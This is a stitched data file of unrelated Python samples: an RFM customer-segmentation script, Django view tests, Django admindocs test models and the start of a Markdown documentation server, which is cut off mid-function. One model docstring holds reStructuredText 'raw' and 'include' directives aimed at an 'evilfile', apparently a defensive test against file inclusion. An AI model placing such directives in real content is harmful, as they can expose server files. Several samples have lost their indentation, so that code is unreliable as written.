rfmSegment['f_qt'] = rfmSegment['frequency_total'].apply(scoreFrequency, args=('frequency_total',quantiles,))
rfmSegment['m_qt'] = rfmSegment['monetary_total'].apply(scoreMonetary, args=('monetary_total',quantiles,))
#%% calculate total RFM score as string composed of individual RFM quantiles
rfmSegment['rfm'] = rfmSegment.r_qt.map(str) \
+ rfmSegment.f_qt.map(str) \
+ rfmSegment.m_qt.map(str)
#%% create categories from rfm
datacomb=[]
datacomb.append([3,3,1,"Big Spenders","331",7])
datacomb.append([1,2,1,"Big Spenders","121",7])
datacomb.append([1,3,1,"Big Spenders","131",7])
datacomb.append([1,4,1,"Big Spenders","141",7])
datacomb.append([2,2,1,"Big Spenders","221",7])
datacomb.append([2,3,1,"Big Spenders","231",7])
datacomb.append([2,4,1,"Big Spenders","241",7])
datacomb.append([3,2,1,"Big Spenders","321",7])
datacomb.append([3,4,1,"Big Spenders","341",7])
datacomb.append([4,2,1,"Big Spenders","421",7])
datacomb.append([4,3,1,"Big Spenders","431",7])
datacomb.append([2,1,1,"Loyal Customers-Big Spenders","211",6])
datacomb.append([3,1,1,"Almost Lost","311",4])
datacomb.append([1,1,1,"Best Customers","111",8])
datacomb.append([4,1,1,"Lost Customers","411",3])
datacomb.append([4,4,4,"Lost Cheap Customers","444",1])
datacomb.append([1,1,2,"Loyal Customers","112",5])
datacomb.append([1,1,3,"Loyal Customers","113",5])
datacomb.append([1,1,4,"Loyal Customers","114",5])
datacomb.append([2,1,2,"Loyal Customers","212",5])
datacomb.append([2,1,3,"Loyal Customers","213",5])
datacomb.append([2,1,4,"Loyal Customers","214",5])
datacomb.append([3,1,2,"Loyal Customers","312",5])
datacomb.append([3,1,3,"Loyal Customers","313",5])
datacomb.append([3,1,4,"Loyal Customers","314",5])
datacomb.append([4,1,2,"Loyal Customers","412",5])
datacomb.append([4,1,3,"Loyal Customers","413",5])
datacomb.append([4,1,4,"Loyal Customers","414",5])
datacomb.append([1,4,2,"Others","142",2])
datacomb.append([1,4,3,"Others","143",2])
datacomb.append([1,4,4,"Others","144",2])
datacomb.append([4,4,1,"Big Spenders","441",7])
datacomb.append([1,2,2,"Others","122",2])
datacomb.append([1,2,3,"Others","123",2])
datacomb.append([1,2,4,"Others","124",2])
datacomb.append([1,3,2,"Others","132",2])
datacomb.append([1,3,3,"Others","133",2])
datacomb.append([1,3,4,"Others","134",2])
datacomb.append([2,2,2,"Others","222",2])
datacomb.append([2,2,3,"Others","223",2])
datacomb.append([2,2,4,"Others","224",2])
datacomb.append([2,3,2,"Others","232",2])
datacomb.append([2,3,3,"Others","233",2])
datacomb.append([2,3,4,"Others","234",2])
datacomb.append([2,4,2,"Others","242",2])
datacomb.append([2,4,3,"Others","243",2])
datacomb.append([2,4,4,"Others","244",2])
datacomb.append([3,2,2,"Others","322",2])
datacomb.append([3,2,3,"Others","323",2])
datacomb.append([3,2,4,"Others","324",2])
datacomb.append([3,3,2,"Others","332",2])
datacomb.append([3,3,3,"Others","333",2])
datacomb.append([3,3,4,"Others","334",2])
datacomb.append([3,4,2,"Others","342",2])
datacomb.append([3,4,3,"Others","343",2])
datacomb.append([3,4,4,"Others","344",2])
datacomb.append([4,2,2,"Others","422",2])
datacomb.append([4,2,3,"Others","423",2])
datacomb.append([4,2,4,"Others","424",2])
datacomb.append([4,3,2,"Others","432",2])
datacomb.append([4,3,3,"Others","433",2])
datacomb.append([4,3,4,"Others","434",2])
datacomb.append([4,4,2,"Others","442",2])
datacomb.append([4,4,3,"Others","443",2])
dfdatacomb= pd.DataFrame(datacomb, columns=['r_qt','f_qt','m_qt', 'description', 'rfm', 'sort'])
#%% import data and clone working dataframe
#%% create data for month to display in chart detail
df_raw['year'] = df_raw['InvoiceDate'].dt.year
df_raw['month'] = df_raw['InvoiceDate'].dt.month
df_final= pd.DataFrame()
df_date = df_raw[['month','year']].drop_duplicates()
for k, r in df_date.iterrows():
#%% get number of unique countries and their names
df = df_raw [(df_raw['month']== r['month']) & (df_raw['year']== r['year'])]
df.country.nunique()
df.country.unique()
#%% drop duplicates and group by country and customer ID
cc = df[['country','customerid']].drop_duplicates()
cc.groupby(['country'])['customerid']. \
aggregate('count').reset_index(). \
sort_values('customerid', ascending=False)
#%% remove customers without customer ID
df = df[pd.notnull(df['customerid'])]
df.isnull().sum(axis=0)
#%% ensure only positive quantities and prices
df.UnitPrice.min()
df.Quantity.min()
df = df[(df['Quantity']>0)]
#%% check unique value for each column
def unique_counts(df):
for i in df.columns:
count = df[i].nunique()
print(i, ": ", count)
unique_counts(df)
#%% add column for total price
df['TotalPrice'] = df['Quantity'] * df['UnitPrice']
#%% determine first and last order date
df['InvoiceDate'].min()
df['InvoiceDate'].max()
#%% establish day after last purchase as point of calculation for recency
now = df['InvoiceDate'].max()
df['InvoiceDate'] = pd.to_datetime(df['InvoiceDate'])
#%% create RFM table
rfmTable = df.groupby(['customerid']).agg({
'InvoiceDate': lambda x: (now - x.max()).days, #recency
'InvoiceNo': lambda x: len(x), #frequency
'TotalPrice': lambda x: x.sum()}) #monetary
rfmTable['InvoiceDate'] = rfmTable['InvoiceDate'].astype(int)
#print(rfmTable)
#%% convert invoice date to integer and rename columns for RFM
rfmTable.rename(columns={
'InvoiceDate': 'recency',
'InvoiceNo': 'frequency',
'TotalPrice': 'monetary'}, inplace=True)
#%% shift rfmTable data to quantiles for segmentation
quantiles = rfmTable.quantile(q=[0.25,0.5,0.75])
quantiles = quantiles.to_dict()
#quantiles
#%% create a segmented RFM table
rfmSegment2 = rfmTable.copy()
#%% create new columns for RFM and assign values based on quantile
rfmSegment2['r_qt'] = rfmSegment2['recency'].apply(scoreRecency, args=('recency',quantiles,))
rfmSegment2['f_qt'] = rfmSegment2['frequency'].apply(scoreFrequency, args=('frequency',quantiles,))
rfmSegment2['m_qt'] = rfmSegment2['monetary'].apply(scoreMonetary, args=('monetary',quantiles,))
#%% calculate total RFM score as string composed of individual RFM quantiles
rfmSegment2['rfm'] = rfmSegment2.r_qt.map(str) \
+ rfmSegment2.f_qt.map(str) \
+ rfmSegment2.m_qt.map(str)
#%% translate raw RFM values to log values for plotting, common log
    rfmSegment2 = rfmSegment2.assign(r_lg = lambda x: np.log10(x.recency))
    rfmSegment2 = rfmSegment2.assign(f_lg = lambda x: np.log10(x.frequency))
    rfmSegment2 = rfmSegment2.assign(m_lg = lambda x: np.log10(x.monetary))
rfmSegment2['month'] = r['month']
rfmSegment2['year'] = r['year']
rfmSegment2['customerid'] = rfmSegment2.index
df_final= df_final.append(rfmSegment2, ignore_index=True)
#df_final = df_final[df_final['customerid'].isin(bestCustomers['customerid'])].sort_values('monetary', ascending=False)
df_final = pd.merge(df_final, dfdatacomb, how='left', on='rfm')[['recency','frequency','monetary','rfm','customerid','month','year','sort']]
df_final['date']= df_final['month'].map(str) + " - " + df_final['year'].map(str)
dic = {}
rfmSegment['customerid'] = rfmSegment.index
for k, r in rfmSegment.iterrows():
    # calculate the score variation between the last two months
rfmSegmentLoc = df_final[(df_final['customerid']==r['customerid'])]
if len(rfmSegmentLoc.index) > 1:
rfmSegment.loc[k, 'variation'] = rfmSegmentLoc.iloc[len(rfmSegmentLoc)-1][['sort']].iloc[0] - rfmSegmentLoc.iloc[len(rfmSegmentLoc)-2][['sort']].iloc[0]
else:
rfmSegment.loc[k,'variation'] = 0
#create dictionary for detail chart
dic.update({ str(int(r['customerid'])): {"customerid" : str(int(r['customerid'])) , "result":[
{
"labels": list(df_final[df_final['customerid']== r['customerid']] ['date']),
'datasets': [{'label': str(r['customerid']) , 'data':list(df_final[df_final['customerid']== r['customerid']] ['sort']), 'lineTension': 0.1,
'backgroundColor': 'rgba(75,192,192,0.4)',
'borderColor': 'rgba(75,192,192,1)', }]
},
{
"labels": list(df_final[df_final['customerid']== r['customerid']] ['date']),
'datasets': [{'label': "Customer ID " + str(r['customerid']) , 'data': list(df_final[df_final['customerid']== r['customerid']] ['recency']), 'lineTension': 0.1,
'backgroundColor': 'rgba(75,192,192,0.4)',
'borderColor': 'rgba(75,192,192,1)', }]
}
,
{
"labels": list(df_final[df_final['customerid']== r['customerid']] ['date']),
'datasets': [{'label': "Customer ID " + str(r['customerid']) , 'data': list(df_final[df_final['customerid']== r['customerid']] ['frequency']), 'lineTension': 0.1,
'backgroundColor': 'rgba(75,192,192,0.4)',
'borderColor': 'rgba(75,192,192,1)', }]
}
,
{
"labels": list(df_final[df_final['customerid']== r['customerid']] ['date']),
'datasets': [{'label': "Customer ID " + str(r['customerid']) , 'data': list(df_final[df_final['customerid']== r['customerid']] ['monetary']), 'lineTension': 0.1,
'backgroundColor': 'rgba(75,192,192,0.4)',
'borderColor': 'rgba(75,192,192,1)', }]
}
]}}
)
with open('rfmcustomersTimeSeries.json', 'w') as fp:
json.dump(dic, fp)
#%% variation among the last 2 months
#%% create json files
#create json for doughnut chart
rfmSegment['customerid']=rfmSegment.index
rfmSegment = pd.merge(rfmSegment, dfdatacomb, how='left', on='rfm')
rfmSegment.index=rfmSegment['customerid']
rfmSegment[['recency_total','frequency_total','monetary_total','customerid','sort', 'description', 'rfm', 'variation']].to_json("rfmcustomers.json", orient='records')
#create json for table
rfmSegment.groupby(['sort','description']).size().reset_index(name='counts').to_json("rfmSegment.json", orient='records')
| StarcoderdataPython |
19477 | <filename>WD/Cwiczenia/rzymskie.py
rzymskie={'I':1,'II':2,'III':3,'IV':4,'V':5,'VI':6,'VII':7,'VIII':8}
print(rzymskie)
print('One dictionary element: \n')
print(rzymskie['I'])
| StarcoderdataPython |
2301 | <reponame>gribbg/x7-geom
"""
Simple file to validate that maketests is working. Call maketests via:
>>> from x7.shell import *; maketests('x7.sample.needs_tests')
"""
def needs_a_test(a, b):
return a+b
| StarcoderdataPython |
23352 | from go.apps.tests.view_helpers import AppViewsHelper
from go.base.tests.helpers import GoDjangoTestCase
class TestHttpApiViews(GoDjangoTestCase):
def setUp(self):
self.app_helper = self.add_helper(AppViewsHelper(u'http_api'))
self.client = self.app_helper.get_client()
def test_show_stopped(self):
"""
Test showing the conversation
"""
conv_helper = self.app_helper.create_conversation_helper(
name=u"myconv")
response = self.client.get(conv_helper.get_view_url('show'))
self.assertContains(response, u"<h1>myconv</h1>")
def test_show_running(self):
"""
Test showing the conversation
"""
conv_helper = self.app_helper.create_conversation_helper(
name=u"myconv", started=True)
response = self.client.get(conv_helper.get_view_url('show'))
self.assertContains(response, u"<h1>myconv</h1>")
def test_edit_view(self):
conv_helper = self.app_helper.create_conversation_helper()
conversation = conv_helper.get_conversation()
self.assertEqual(conversation.config, {})
response = self.client.post(conv_helper.get_view_url('edit'), {
'http_api-api_tokens': 'token',
'http_api-push_message_url': 'http://messages/',
'http_api-push_event_url': 'http://events/',
'http_api-metric_store': 'foo_metric_store',
}, follow=True)
self.assertRedirects(response, conv_helper.get_view_url('show'))
reloaded_conv = conv_helper.get_conversation()
self.assertEqual(reloaded_conv.config, {
'http_api': {
'push_event_url': 'http://events/',
'push_message_url': 'http://messages/',
'api_tokens': ['token'],
'metric_store': 'foo_metric_store',
'ignore_events': False,
'ignore_messages': False,
}
})
def test_edit_view_no_event_url(self):
conv_helper = self.app_helper.create_conversation_helper()
conversation = conv_helper.get_conversation()
self.assertEqual(conversation.config, {})
response = self.client.post(conv_helper.get_view_url('edit'), {
'http_api-api_tokens': 'token',
'http_api-push_message_url': 'http://messages/',
'http_api-push_event_url': '',
'http_api-metric_store': 'foo_metric_store',
})
self.assertRedirects(response, conv_helper.get_view_url('show'))
reloaded_conv = conv_helper.get_conversation()
self.assertEqual(reloaded_conv.config, {
'http_api': {
'push_event_url': None,
'push_message_url': 'http://messages/',
'api_tokens': ['token'],
'metric_store': 'foo_metric_store',
'ignore_events': False,
'ignore_messages': False,
}
})
self.assertEqual(conversation.config, {})
response = self.client.get(conv_helper.get_view_url('edit'))
self.assertContains(response, 'http://messages/')
self.assertContains(response, 'foo_metric_store')
self.assertEqual(response.status_code, 200)
def test_edit_view_no_push_urls(self):
conv_helper = self.app_helper.create_conversation_helper()
conversation = conv_helper.get_conversation()
self.assertEqual(conversation.config, {})
response = self.client.post(conv_helper.get_view_url('edit'), {
'http_api-api_tokens': 'token',
'http_api-push_message_url': '',
'http_api-push_event_url': '',
'http_api-metric_store': 'foo_metric_store',
})
self.assertRedirects(response, conv_helper.get_view_url('show'))
reloaded_conv = conv_helper.get_conversation()
self.assertEqual(reloaded_conv.config, {
'http_api': {
'push_event_url': None,
'push_message_url': None,
'api_tokens': ['token'],
'metric_store': 'foo_metric_store',
'ignore_events': False,
'ignore_messages': False,
}
})
self.assertEqual(conversation.config, {})
response = self.client.get(conv_helper.get_view_url('edit'))
self.assertContains(response, 'foo_metric_store')
self.assertEqual(response.status_code, 200)
| StarcoderdataPython |
150184 | """
Models for testing various aspects of the django.contrib.admindocs app
"""
from django.db import models
class Company(models.Model):
name = models.CharField(max_length=200)
class Group(models.Model):
name = models.CharField(max_length=200)
class Family(models.Model):
last_name = models.CharField(max_length=200)
class Person(models.Model):
"""
Stores information about a person, related to :model:`myapp.Company`.
**Notes**
Use ``save_changes()`` when saving this object.
``company``
Field storing :model:`myapp.Company` where the person works.
(DESCRIPTION)
.. raw:: html
:file: admin_docs/evilfile.txt
.. include:: admin_docs/evilfile.txt
"""
first_name = models.CharField(max_length=200, help_text="The person's first name")
last_name = models.CharField(max_length=200, help_text="The person's last name")
company = models.ForeignKey(Company, models.CASCADE, help_text="place of work")
family = models.ForeignKey(Family, models.SET_NULL, related_name='+', null=True)
groups = models.ManyToManyField(Group, help_text="has membership")
def _get_full_name(self):
return "%s %s" % (self.first_name, self.last_name)
def rename_company(self, new_name):
self.company.name = new_name
self.company.save()
return new_name
def dummy_function(self, baz, rox, *some_args, **some_kwargs):
return some_kwargs
@property
def a_property(self):
return 'a_property'
def suffix_company_name(self, suffix='ltd'):
return self.company.name + suffix
def add_image(self):
pass
def delete_image(self):
pass
def save_changes(self):
pass
def set_status(self):
pass
def get_full_name(self):
"""
Get the full name of the person
"""
return self._get_full_name()
def get_status_count(self):
return 0
def get_groups_list(self):
return []
| StarcoderdataPython |
9595 | """ docnado.py
A rapid documentation tool that will blow you away.
"""
import os
import re
import sys
import csv
import glob
import time
import signal
import shutil
import urllib
import base64
import hashlib
import argparse
import tempfile
import datetime
import threading
import traceback
import subprocess
import platform
import requests
from bs4 import BeautifulSoup
from multiprocessing import Pool
from urllib.parse import urlparse
from watchdog.observers import Observer
from watchdog.events import PatternMatchingEventHandler
from xml.etree import ElementTree
from flask import Flask, url_for, abort, send_from_directory, \
render_template, Markup, make_response, render_template_string
import markdown
import markdown.util
from markdown.extensions import Extension
from markdown.postprocessors import Postprocessor
from markdown.inlinepatterns import LinkPattern, IMAGE_LINK_RE, dequote, handleAttributes
from markdown.blockprocessors import HashHeaderProcessor
from http.client import responses
if __package__:
from .navtree import NavItem, parse_nav_string
else:
from navtree import NavItem, parse_nav_string
class MultiPurposeLinkPattern(LinkPattern):
""" Embed image, video, youtube, csv or file download links
by extending the typical image tag pattern.
#  or 
If the link has "DOWNLOAD" in the alt text, treat it as a download.
Otherwise, see if its a YouTube video. Otherwise, see if its a
csv that can be turned into a table, otherwise if the link cannot be parsed
as a video, it will always be treated as an image.
"""
SUPPORTED_VIDEO = ('ogv', 'ogg', 'avi', 'mp4', 'webm', )
SUPPORTED_TABLES = ('csv', )
SUPPORTED_PDF = ('pdf', )
def get_src(self, m):
""" Get the source and parts from the matched groups: src, parts """
src_parts = m.group(9).split()
if src_parts:
src = src_parts[0]
if src[0] == "<" and src[-1] == ">":
src = src[1:-1]
return self.sanitize_url(self.unescape(src)), src_parts
else:
return '', src_parts
@staticmethod
def youtube_url_validation(url):
""" Given a YouTube URL, return the ID component.
https://stackoverflow.com/questions/4705996
"""
youtube_regex = (r'(https?://)?(www\.)?'
r'(youtube|youtu|youtube-nocookie)\.(com|be)/'
r'(watch\?v=|embed/|v/|.+\?v=)?([^&=%\?]{11})')
youtube_regex_match = re.match(youtube_regex, url)
return youtube_regex_match.group(6) if youtube_regex_match else None
@staticmethod
def as_youtube(m, video_id):
""" Return a DOM element that embeds a YouTube video. """
el = ElementTree.Element('iframe')
el.set('class', 'video')
el.set('src', f'https://www.youtube.com/embed/{video_id}?rel=0')
el.set('frameborder', '0')
el.set('allow', 'autoplay; encrypted-media')
el.set('allowfullscreen', '1')
return el
def as_pdf(self, m):
""" Return a DOM element that embeds a PDF document using an embed. """
src, parts = self.get_src(m)
wrapper = ElementTree.Element('aside')
wrapper.set('class', 'pdf-embed-wrapper')
el = ElementTree.SubElement(wrapper, 'embed')
el.set('class', 'pdf-embed')
el.set('src', src)
el.set('width', '100%')
el.set('type', 'application/pdf')
el.set('height', '100%') # width * 1.4142 (aspect ratio of a4)
el.set('pluginspage', 'http://www.adobe.com/products/acrobat/readstep2.html')
if len(parts) > 1:
el.set('alt', dequote(self.unescape(" ".join(parts[1:]))))
return wrapper
def as_video(self, m):
""" Return a video element """
src, parts = self.get_src(m)
el = ElementTree.Element('video')
el.set('src', src)
el.set("controls", "true")
handleAttributes(m.group(2), el)
return el
def as_image(self, m):
""" Return an image element """
el = ElementTree.Element('img')
src, parts = self.get_src(m)
el.set('src', src)
# Set the title if present.
if len(parts) > 1:
el.set('title', dequote(self.unescape(" ".join(parts[1:]))))
# Set the attributes on the element, if enabled.
# Set the 'alt' attribute with whatever is left from `handleAttributes`.
attrs = self.markdown.enable_attributes
alt_text = handleAttributes(m.group(2), el) if attrs else m.group(2)
el.set('alt', self.unescape(alt_text))
return el
def as_csv(self, m):
src, parts = self.get_src(m)
root = ElementTree.Element('table')
root.set('source', src)
root.set('class', 'csv-table table thead-light table-hover')
file_path = os.path.join(self.markdown.page_root, src)
with open(file_path, 'r', encoding='utf-8') as f:
reader = csv.reader(f)
headers = next(reader)
rows = [r for r in reader]
thead = ElementTree.SubElement(root, 'thead')
for col in headers:
ElementTree.SubElement(thead, 'th').text = col
for row in rows:
tr = ElementTree.SubElement(root, 'tr')
for col in row:
ElementTree.SubElement(tr, 'td').text = col
return root
def as_download(self, m):
""" Create card layers used to make a download button. """
src, parts = self.get_src(m)
# Returns a human readable string representation of bytes
def _human_size(byte_number, units=(' bytes', 'KB', 'MB', 'GB', 'TB', 'PB', 'EB')):
return str(byte_number) + units[0] if byte_number < 1024 else _human_size(byte_number >> 10, units[1:])
# Get information required for card.
split_src = os.path.split(src)
file_path = os.path.join(self.markdown.page_root, *split_src)
file_size = os.path.getsize(file_path)
file_basename = os.path.basename(file_path)
card_text = dequote(self.unescape(" ".join(parts[1:]))) if len(parts) > 1 else ''
# If its a pptx, extract the thumbnail previews.
# NOTE: This works, but is is removed until we support other
# file types, which for now is not a priority.
# preview_uri = None
# import zipfile
# if (file_path.endswith('pptx')):
# with zipfile.ZipFile(file_path) as zipper:
# with zipper.open('docProps/thumbnail.jpeg', 'r') as fp:
# mime = 'image/jpeg'
# data64 = base64.b64encode(fp.read()).decode('utf-8')
# preview_uri = u'data:%s;base64,%s' % (mime, data64)
# Card and structure.
card = ElementTree.Element("div")
card.set('class', 'card download-card')
header = ElementTree.SubElement(card, 'div')
header.set('class', 'download-card-header')
body = ElementTree.SubElement(card, 'div')
body.set('class', 'download-card-body')
# Add preview image.
# if preview_uri:
# img = ET.SubElement(header, 'img')
# img.set('src', preview_uri)
# Filename link heading.
heading = ElementTree.SubElement(body, 'a')
heading.set('class', 'download-card-title')
heading.set('href', src)
download_icon = ElementTree.SubElement(heading, 'i')
download_icon.set('class', 'fa fa-download')
download_text = ElementTree.SubElement(heading, 'span')
download_text.text = file_basename
# Title element from the "quote marks" part.
body_desc = ElementTree.SubElement(body, 'span')
body_desc.text = card_text
# File size span at the bottom.
body_size = ElementTree.SubElement(body, 'span')
body_size.set('class', 'small text-muted')
body_size.text = f'{_human_size(file_size)}'
return card
@staticmethod
def _is_inject(m):
""" Determine if the ALT text [] part of the link says 'INJECT'. """
alt = m.group(2)
return alt.lower() == 'inject'
def as_raw(self, m):
""" Load the HTML document specified in the link, parse it to HTML elements and return it.
"""
src, parts = self.get_src(m)
# Find the path to the HTML document, relative to the current markdown page.
file_path = os.path.join(self.markdown.page_root, src)
raw_html_string = read_html_for_injection(file_path)
if len(parts) < 2:
parts.append("nothing_one=1||nothing_two=2")
# Helper function.
def _argify(args):
if '=' not in args:
raise ValueError('injection template requires named arguments split by ||')
left, right = args.split('=')
return left.strip(), right.strip()
        # Split the arg string on double pipes. Joining the parts first undoes the automatic splitting done by markdown.
arg_strings = " ".join(parts[1:]).strip('\"').split("||")
# Parse into dictionary of key-value pairs based on the '=' notation.
try:
named_args = dict([_argify(args) for args in arg_strings])
except Exception as e:
raise Exception(f"Error parsing ![INJECT] arguments in {self.markdown.page_file} {repr(e)}")
# Take the template renderer and give it our string, and named args.
# Capture the output as a string.
try:
injectable_templated_str = render_template_string(raw_html_string, **named_args)
except Exception as e:
raise Exception(f"Error rendering ![INJECT] template for file {file_path} {repr(e)}")
# Feed that string to the XML parser.
try:
return ElementTree.fromstring(injectable_templated_str)
except Exception as e:
raise Exception(f"Error parsing ![INJECT] template for file {file_path} {repr(e)}")
@staticmethod
def _is_download(m):
""" Determine if the ALT text [] part of the link says 'DOWNLOAD'. """
alt = m.group(2)
return alt.lower() == 'download'
def handleMatch(self, m):
""" Use the URL extension to render the link. """
src, parts = self.get_src(m)
if self._is_download(m):
return self.as_download(m)
elif self._is_inject(m):
return self.as_raw(m)
youtube = self.youtube_url_validation(src)
if youtube:
return self.as_youtube(m, youtube)
src_lower = src.lower()
if src_lower.endswith(self.SUPPORTED_TABLES):
return self.as_csv(m)
elif src_lower.endswith(self.SUPPORTED_PDF):
return self.as_pdf(m)
elif src_lower.endswith(self.SUPPORTED_VIDEO):
return self.as_video(m)
return self.as_image(m)
class OffsetHashHeaderProcessor(HashHeaderProcessor):
""" Process hash headers with an offset to control the type of heading
DOM element that is generated. """
HEADING_LEVEL_OFFSET = 1
def run(self, parent, blocks):
block = blocks.pop(0)
m = self.RE.search(block)
if m:
before = block[:m.start()]
after = block[m.end():]
if before:
self.parser.parseBlocks(parent, [before])
heading_level = len(m.group('level'))
h = ElementTree.SubElement(parent, 'h%d' % (heading_level + self.HEADING_LEVEL_OFFSET))
h.text = m.group('header').strip()
if after:
blocks.insert(0, after)
class ChecklistPostprocessor(Postprocessor):
"""
Adds checklist class to list element.
Adapted from: `markdown_checklist.extension`
"""
pattern = re.compile(r'<li>\[([ Xx])\]')
def run(self, html):
html = re.sub(self.pattern, self._convert_checkbox, html)
before = '<ul>\n<li><input type="checkbox"'
after = before.replace('<ul>', '<ul class="checklist">')
html = html.replace(before, after)
return html
@staticmethod
def _convert_checkbox(match):
state = match.group(1)
checked = ' checked' if state != ' ' else ''
return '<li><input type="checkbox" disabled%s>' % checked
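    # Example (illustrative): the markdown list item "- [x] done" reaches this postprocessor
    # as "<li>[x] done", is rewritten to '<li><input type="checkbox" disabled checked> done',
    # and the enclosing <ul> gains the "checklist" class.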
# Remove the `video`, `iframe`, `aside`, and `table` elements as block elements.
markdown.util.BLOCK_LEVEL_ELEMENTS = re.compile(
r"^(p|div|h[1-6]|blockquote|pre|dl|ol|ul"
r"|script|noscript|form|fieldset|math"
r"|hr|hr/|style|li|dt|dd|thead|tbody"
r"|tr|th|td|section|footer|header|group|figure"
r"|figcaption|article|canvas|output"
r"|progress|nav|main)$",
re.IGNORECASE
)
class MultiExtension(Extension):
""" Markdown `Extension` that adds our new components and
overrides some that we are not using.
"""
def extendMarkdown(self, md, md_globals):
""" Configure markdown by disabling elements and replacing them with
others. """
# Add checklist processing extension based on: 'markdown_checklist.extension'.
md.postprocessors.add('checklist', ChecklistPostprocessor(md), '>raw_html')
# Remove default patterns.
del md.inlinePatterns['image_link']
# Create a new one and insert into pipeline.
multi_purpose_pattern = MultiPurposeLinkPattern(IMAGE_LINK_RE, md)
md.inlinePatterns['multi_purpose_pattern'] = multi_purpose_pattern
# Remove line headers.
del md.parser.blockprocessors['setextheader']
# Swap hash headers for one that can change the DOM h1, h2 level.
md.parser.blockprocessors['hashheader'] = OffsetHashHeaderProcessor(md.parser)
# https://python-markdown.github.io/extensions/
mdextensions = [MultiExtension(),
'markdown.extensions.tables',
'markdown.extensions.meta',
'markdown.extensions.def_list',
'markdown.extensions.headerid',
'markdown.extensions.fenced_code',
'markdown.extensions.attr_list']
def build_meta_cache(root):
""" Recursively search for Markdown files and build a cache of `Meta`
from metadata in the Markdown.
:param root: str: The path to search for files from.
"""
doc_files = glob.iglob(root + '/**/*.md', recursive=True)
def _meta(path):
with open(path, 'r', encoding='utf-8') as f:
md = markdown.Markdown(extensions=mdextensions)
md.page_root = os.path.dirname(path)
Markup(md.convert(f.read()))
return md.Meta if hasattr(md, 'Meta') else None
doc_files_meta = {os.path.relpath(path, start=root): _meta(path) for path in doc_files}
doc_files_meta = {path: value for path, value in doc_files_meta.items() if value is not None}
# If a nav filter is set, exclude relevant documents.
# This takes the comma separated string supplied to `nav_limit`
# and excludes certain documents if they are NOT in this list.
global CMD_ARGS
if CMD_ARGS.nav_limit:
nav_filters = CMD_ARGS.nav_limit.split(',')
nav_filters = [nav_filter.strip().lower() for nav_filter in nav_filters]
nav_filters = [nav_filter for nav_filter in nav_filters if nav_filter]
def _should_include(doc_meta):
nav_strings = [nav.lower() for nav in doc_meta.get('nav', [])]
return any([y.startswith(x) for x in nav_filters for y in nav_strings])
doc_files_meta = {path: value for path, value in doc_files_meta.items() if _should_include(value)}
return doc_files_meta
def build_nav_menu(meta_cache):
""" Given a cache of Markdown `Meta` data, compile a structure that can be
used to generate the NAV menu.
This uses the `nav: Assembly>Bench>Part` variable at the top of the Markdown file.
"""
root = NavItem('root', 0)
    # Pre-sort the nav-items alphabetically by nav-string. This will get overridden by the arrange()
    # function, but it avoids un-arranged items moving around between page refreshes due to dicts being
    # unordered.
sorted_meta_cache = sorted(
meta_cache.items(),
key = lambda items: items[1].get('nav', [''])[0].split('>')[-1] # Sort by the last part of the nav string for each page.
)
for path, meta in sorted_meta_cache:
nav_str = meta.get('nav', [None])[0]
nav_chunks = parse_nav_string(nav_str)
node = root
for name, weight in nav_chunks:
n = NavItem(name, weight)
node = node.add(n)
node.bind(meta=meta, link=path)
root.arrange()
return root
def build_reload_files_list(extra_dirs):
""" Given a list of directories, return a list of files to watch for modification
and subsequent server reload. """
extra_files = extra_dirs[:]
for extra_dir in extra_dirs:
for dirname, dirs, files in os.walk(extra_dir):
for filename in files:
filename = os.path.join(dirname, filename)
if os.path.isfile(filename):
extra_files.append(filename)
return extra_files
def read_html_for_injection(path):
""" Open an HTML file at the given path and return the contents
as a string. If the file does not exist, we raise an exception.
"""
# TODO: In the future, consider adding some caching here. However,
    # beware of reloading / refreshing the page UX implications.
with open(path) as file:
return file.read()
def _render_markdown(file_path, **kwargs):
""" Given a `file_path` render the Markdown and return the result of `render_template`.
"""
global NAV_MENU, PROJECT_LOGO, PDF_GENERATION_ENABLED
default_template = 'document'
with open(file_path, 'r', encoding='utf-8') as f:
md = markdown.Markdown(extensions=mdextensions)
md.page_root = os.path.dirname(file_path)
md.page_file = file_path
markup = Markup(md.convert(f.read()))
# Fetch the template defined in the metadata.
template = md.Meta.get('template', None)
template = template[0] if template else default_template
if not template:
raise Exception('no template found for document')
template = f'{template}.html'
# Load any HTML to be injected from the meta-data.
injections = md.Meta.get('inject', [])
injections = [os.path.join(md.page_root, file) for file in injections]
injections = [read_html_for_injection(file) for file in injections]
# Render it out with all the prepared data.
return render_template(template,
content=markup,
nav_menu=NAV_MENU,
project_logo=PROJECT_LOGO,
pdf_enabled=PDF_GENERATION_ENABLED,
injections=injections,
**md.Meta,
**kwargs)
def configure_flask(app, root_dir):
""" Setup the flask application within this scope. """
@app.before_first_request
def build_navigation_cache():
""" Build an in-memory cache of document meta-data.
NOTE: The design choice is made to crash the application if any
of the markdown files cannot be opened and parsed. In the
future when it becomes more stable, this will probably change.
"""
# This is called each time the server restarts.
global NAV_MENU
meta_cache = build_meta_cache(root_dir)
# Build the nav menu data-structure.
NAV_MENU = build_nav_menu(meta_cache)
# Store the reference to the function that rebuilds the navigation cache.
app.build_navigation_cache = build_navigation_cache
@app.template_filter('gravatar')
def gravatar(email, size=100, rating='g', default='retro', use_ssl=False):
""" Return a gravatar link for a given email address. """
url = "https://secure.gravatar.com/avatar/" if use_ssl else "http://www.gravatar.com/avatar/"
email = email.strip().lower().encode('utf-8')
hash_email = hashlib.md5(email).hexdigest()
return f'{url}{hash_email}?s={size}&r={rating}&d={default}'
@app.template_filter()
def url_unquote(url):
""" Removes encoding around a URL. """
return urllib.parse.unquote(url)
@app.route('/favicon.ico')
def favicon():
return send_from_directory(os.path.join(app.root_path, 'static'),
'favicon.ico', mimetype='image/vnd.microsoft.icon')
@app.route("/print_header")
def print_header():
""" Render the template for the header used when printing with WKPDFTOHTML. """
global PROJECT_LOGO
return render_template('print_header.html', project_logo=PROJECT_LOGO)
@app.route("/print_footer")
def print_footer():
""" Render the template for the footer used when printing with WKPDFTOHTML. """
global PROJECT_LOGO
return render_template('print_footer.html', project_logo=PROJECT_LOGO)
@app.errorhandler(404)
def page_not_found(e):
global NAV_MENU, PROJECT_LOGO
return render_template('404.html', nav_menu=NAV_MENU, project_logo=PROJECT_LOGO), 404
@app.route("/w/<path:page>")
def wiki(page):
""" Render the page. """
file_path = os.path.abspath(os.path.join(root_dir, page))
if not os.path.isfile(file_path):
abort(404)
if '.md' in [ext.lower() for ext in os.path.splitext(file_path)]:
return _render_markdown(file_path, current_page=page)
else:
return send_from_directory(os.path.dirname(file_path), os.path.basename(file_path))
@app.route("/")
@app.route("/w/")
def homepage():
return wiki('home.md')
@app.route("/pdf/<path:page>")
def wiki_pdf(page):
